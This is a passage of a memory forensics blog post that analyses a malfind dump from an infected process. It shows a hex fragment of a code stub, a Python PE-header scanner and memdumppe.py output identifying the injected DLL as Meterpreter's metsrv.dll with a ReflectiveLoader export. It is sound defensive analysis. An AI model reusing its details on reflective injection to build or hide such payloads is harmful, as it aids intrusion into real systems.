</span>]H..A...&5...V.p</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#f4f4f4">000000f0: 0500 0000 0000 00ff 00dc 0000 0000 00</font><font color="#04ff00">4d</font><span class="Apple-converted-space" style="color: #f4f4f4;"> </span><font color="#f4f4f4">...............M</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#f4f4f4">00000100: </font><font color="#04ff00">5a</font><font color="#f4f4f4">41 5255 4889 e548 83ec 20e8 0000 0000</font><span class="Apple-converted-space" style="color: #f4f4f4;"> </span><font color="#f4f4f4">ZARUH..H.. 
.....</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000110: 5b48 81c3 af1e 0000 ffd3 4881 c340 0312<span class="Apple-converted-space"> </span>[H........H..@..</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000120: 0089 3b49 89d8 6a04 5aff d000 0000 0000<span class="Apple-converted-space"> </span>..;I..j.Z.......</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000130: 0000 0000 0000 0000 0000 0000 0100 000e<span class="Apple-converted-space"> </span>................</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000140: 1fba 0e00 b409 cd21 b801 4ccd 2154 6869<span class="Apple-converted-space"> </span>.......!..L.!Thi</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" 
style="font-variant-ligatures: no-common-ligatures;">00000150: 7320 7072 6f67 7261 6d20 6361 6e6e 6f74<span class="Apple-converted-space"> </span>s program cannot</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000160: 2062 6520 7275 6e20 696e 2044 4f53 206d <span class="Apple-converted-space"> </span>be run in DOS m</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Note the presence of the MZ header at offset 0xFF. Ballenthin's </font><font face="courier">memdumppe.py</font><font face="inherit"> takes an offset to the MZ header as an argument. Above I passed 0 as that offset and </font><font face="courier">memdumppe.py</font><font face="inherit"> failed. 
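</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Reading the offset off a hex dump by eye works for one file, but malfind can hand you dozens of these and the header is not always at a round number. The scanner below is an added example written for this post; it is not part of Ballenthin's <font face="courier">memdumppe.py</font> and the function names (<font face="courier">find_pe_headers</font>, <font face="courier">parse_pe_at</font>, <font face="courier">build_sample_dump</font>) are mine. It walks a dump looking for every <font face="courier">MZ</font>, follows <font face="courier">e_lfanew</font> and only reports candidates whose <font face="courier">PE\0\0</font> signature lands inside the buffer, which is exactly the check that offset 0 fails above. The input it ships with is constructed, not the dump from this post: a 255-byte filler stub that reuses the dump's first four bytes and carries a decoy <font face="courier">MZ</font>, followed by a minimal 64-bit DLL header.</font></span></div>
<pre>
```python
"""Locate PE headers hidden behind a code stub in a memory dump.

Added example for this post, not part of memdumppe.py. It scans a buffer for
every 'MZ', follows e_lfanew and keeps only candidates whose 'PE\\0\\0'
signature lies inside the buffer, then reports the IMAGE_FILE_HEADER facts an
analyst wants before handing the offset to a PE parser.
"""
import sys
from datetime import datetime, timezone

DOS_SIG = b"MZ"
NT_SIG = b"PE\x00\x00"
FILE_HEADER_SIZE = 20            # sizeof(IMAGE_FILE_HEADER)
IMAGE_FILE_DLL = 0x2000
PE32PLUS_MAGIC = 0x20B
MACHINE_NAMES = {0x14C: "i386", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "ARM64"}


def u16(buf, off):
    return int.from_bytes(buf[off:off + 2], "little")


def u32(buf, off):
    return int.from_bytes(buf[off:off + 4], "little")


def parse_pe_at(buf, off):
    """Return header facts for a PE whose DOS header starts at buf[off], else None."""
    if off + 0x40 > len(buf) or buf[off:off + 2] != DOS_SIG:
        return None
    e_lfanew = u32(buf, off + 0x3C)
    nt = off + e_lfanew
    # e_lfanew is relative to the MZ. A DOS header is 64 bytes, and the NT
    # signature, file header and optional-header magic must all fit in the dump.
    # Offset 0 of the post's dump fails here: its dword at 0x3c is 0x2c027c61.
    if e_lfanew < 0x40 or nt + 4 + FILE_HEADER_SIZE + 2 > len(buf):
        return None
    if buf[nt:nt + 4] != NT_SIG:
        return None
    fh = nt + 4                  # IMAGE_FILE_HEADER follows the 4-byte signature
    return {
        "offset": off,
        "e_lfanew": e_lfanew,
        "machine": MACHINE_NAMES.get(u16(buf, fh), hex(u16(buf, fh))),
        "sections": u16(buf, fh + 2),
        "timestamp": datetime.fromtimestamp(u32(buf, fh + 4), tz=timezone.utc).isoformat(),
        "is_dll": bool(u16(buf, fh + 18) & IMAGE_FILE_DLL),
        "pe32plus": u16(buf, fh + FILE_HEADER_SIZE) == PE32PLUS_MAGIC,
    }


def find_pe_headers(buf):
    """Every offset in buf that holds a validated PE header, in file order."""
    hits = []
    pos = buf.find(DOS_SIG)
    while pos != -1:
        info = parse_pe_at(buf, pos)
        if info is not None:
            hits.append(info)
        pos = buf.find(DOS_SIG, pos + 1)
    return hits


def build_sample_dump():
    """Constructed test input, not the dump from the post: a 255-byte stub that
    opens with the same four bytes as that dump and carries a decoy 'MZ' whose
    e_lfanew points outside the buffer, followed by a minimal x64 DLL header."""
    stub = bytearray(b"\x90" * 255)
    stub[0:4] = b"\xfc\x48\x89\xce"                      # cld; mov rsi, rcx
    stub[0x10:0x12] = DOS_SIG                            # decoy MZ ...
    stub[0x10 + 0x3C:0x10 + 0x40] = (0x7FFFFFFF).to_bytes(4, "little")  # ... with a bogus e_lfanew
    dos = bytearray(0x40)
    dos[0:2] = DOS_SIG
    dos[0x3C:0x40] = (0x40).to_bytes(4, "little")        # NT headers directly after the DOS header
    file_header = (
        (0x8664).to_bytes(2, "little")                   # Machine: x86-64
        + (3).to_bytes(2, "little")                      # NumberOfSections
        + (1489773454).to_bytes(4, "little")             # TimeDateStamp: 2017-03-17T17:57:34Z
        + bytes(8)                                       # PointerToSymbolTable, NumberOfSymbols
        + (240).to_bytes(2, "little")                    # SizeOfOptionalHeader (PE32+)
        + (0x2022).to_bytes(2, "little")                 # EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE | DLL
    )
    optional = PE32PLUS_MAGIC.to_bytes(2, "little") + bytes(238)
    return bytes(stub + dos + NT_SIG + file_header + optional)


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dump()
    for hit in find_pe_headers(data):
        print(f"MZ at {hit['offset']} (0x{hit['offset']:x}) -> PE: {hit['machine']}, "
              f"{hit['sections']} sections, dll={hit['is_dll']}, "
              f"pe32+={hit['pe32plus']}, timestamp {hit['timestamp']}")
```
</pre>
<div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">With no argument it runs against the constructed sample and reports the header at 255; saved as, say, <font face="courier">find_pe.py</font> (a name of my choosing) and pointed at the malfind dump above it should report the same 255 (0xFF) found by eye, which is the number <font face="courier">memdumppe.py</font> needs. The decoy shows why the <font face="courier">PE\0\0</font> check matters: a bare search for the two bytes <font face="courier">MZ</font> will fire on code and data that are nothing of the sort.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">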
Let's try again with the offset of 255:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2"><font color="#f4f4f4">davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xdc0000.dmp </font><font color="#04ff00">255</font><font color="#f4f4f4"> | more</font></font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">timestamp: 2017-03-17T17:57:34+00:00</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" 
style="font-variant-ligatures: no-common-ligatures;">checksum: 0x12beb5</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">export name: metsrv.dll</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">exports:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>0) Init</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space" style="color: #f4f4f4;"> </span><font color="#f4f4f4">1) </font><font color="#04ff00">ReflectiveLoader</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>2) buffer_from_file</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 
0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>3) buffer_to_file</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>4) channel_close</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>5) channel_create</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>6) channel_create_datagram</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>7) channel_create_pool</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>8) channel_create_stream</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>9) channel_default_io_handler</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>10) channel_destroy</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>11) channel_exists</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>12) channel_find_by_id</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 
0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>13) channel_get_buffered_io_context</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>14) channel_get_class</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>15) channel_get_flags</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>16) channel_get_id</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>17) channel_get_native_io_context</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: 
no-common-ligatures;"><span class="Apple-converted-space"> </span>18) channel_get_type</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>19) channel_interact</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>20) channel_is_flag</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>21) channel_is_interactive</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>22) channel_open</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>23) channel_read</span></p><p 
class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>24) channel_read_from_buffered</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>25) channel_set_buffered_io_handler</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>26) channel_set_flags</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>27) channel_set_interactive</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>28) channel_set_native_io_context</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); 
color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>29) channel_set_type</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>30) channel_write</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>31) channel_write_to_buffered</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>32) channel_write_to_remote</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>33) command_deregister</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>34) command_deregister_all</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>35) command_handle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>36) command_join_threads</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>37) command_register</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>38) command_register_all</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 
0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>39) core_update_desktop</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>40) core_update_thread_token</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>41) packet_add_completion_handler</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>42) packet_add_exception</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>43) packet_add_group</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: 
no-common-ligatures;"><span class="Apple-converted-space"> </span>44) packet_add_tlv_bool</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>45) packet_add_tlv_group</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>46) packet_add_tlv_qword</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>47) packet_add_tlv_raw</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>48) packet_add_tlv_string</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>49) 
